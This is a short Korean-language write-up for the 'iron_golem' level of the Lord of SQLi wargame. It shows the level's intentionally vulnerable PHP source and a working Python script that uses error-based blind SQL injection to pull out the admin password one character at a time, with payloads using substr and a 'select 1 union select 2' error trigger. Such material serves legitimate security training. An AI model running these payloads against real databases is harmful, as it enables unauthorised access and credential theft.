LOS iron_golem

<?php
  include "./config.php"; 
  login_chk(); 
  dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysql_fetch_array(mysql_query($query));
  if(mysql_error()) exit(mysql_error());
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysql_fetch_array(mysql_query($query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("iron_golem");
  highlight_file(__FILE__);
?>

이제 내 쿼리가 성공하였는지 확인할 Hello id가 없어지고 mysql_error발생하면 출력을해주고 EXIT해주는 코드가 추가되었다.

만약 우리가 조건을 걸어주고 그 조건이 아닐때 mysql error를 일으키면 블라인드 sql injection이 가능해진다 (조건이 맞을때도 상관없음.)

import urllib2
 
j = 1
input_ = 0x21 #0
passwd = ''
 
while(True):
    url = 'https://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php?pw=\' or id=\'admin\' and if(substr(pw,%d,1)=0x%x,1,(select 1 union select 2))' %(j,input_)
    url += '%23'
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0')
    req.add_header('cookie','PHPSESSID=p1fad2hverso8kg1fs3fndoof6')
    data = urllib2.urlopen(req).read()
    if 'include' in data:
        passwd += chr(input_)
        j += 1
        print 'Search Key is '+passwd
        print 'Search hex Key is %d'%(input_)
        if len(passwd) == 16:
            break
        input_= 0x21
    else:
        print url
        input_+=1
 
print 'Key is'
print passwd.encode('hex')

error blind sql injection